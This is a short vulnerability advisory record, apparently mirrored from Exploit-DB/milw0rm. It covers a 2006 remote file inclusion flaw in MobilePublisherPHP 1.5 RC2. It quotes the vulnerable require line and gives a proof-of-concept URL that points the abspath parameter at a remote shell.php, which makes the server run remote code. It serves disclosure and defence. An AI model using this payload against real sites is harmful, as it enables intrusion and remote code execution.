MobilePublisherPHP 1.5 RC2 (functions.php)Remote Include Vulnerability

vendor:

MobilePublisherPHP

by:

Timq

7,5

CVSS

HIGH

Remote Include Vulnerability

CWE

Product Name: MobilePublisherPHP

Affected Version From: 1.5 RC2

Affected Version To: 1.5 RC2

Patch Exists: YES

Related CWE: N/A

CPE: a:mobilepublisherphp:mobilepublisherphp:1.5rc2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

MobilePublisherPHP 1.5 RC2 (functions.php)Remote Include Vulnerability

Discovered by Timq, a vulnerable code require $abspath."/functions.php"; can be exploited by sending a malicious URL http://site.com/[dir]/header.php?abspath=http://site.com/shell.php? to the target server.

Mitigation:

Input validation and sanitization should be done to prevent malicious code execution.

Source

Exploit-DB raw data:

MobilePublisherPHP 1.5 RC2 (functions.php)Remote Include Vulnerability

##################################################################

Discovered by: Timq
http://www.securitydb.org

Team-Rootshell
##################################################################

Email: timq[at]hackernetwork[dot]com

http://www.securitydb.org

Team-Rootshell
##################################################################

Vulnerable: require $abspath."/functions.php";

###################################################################

Exploit PoC:

http://site.com/[dir]/header.php?abspath=http://site.com/shell.php?


####################################################################

Shoutz: Warpboy,Z66,Gammarays,Archangel,Cm2,Splinter,InTel,Preddy,Ice,ErazerZ,Maggot
PunKerX,Pepin,Ender


#####################################################################

# milw0rm.com [2006-09-17]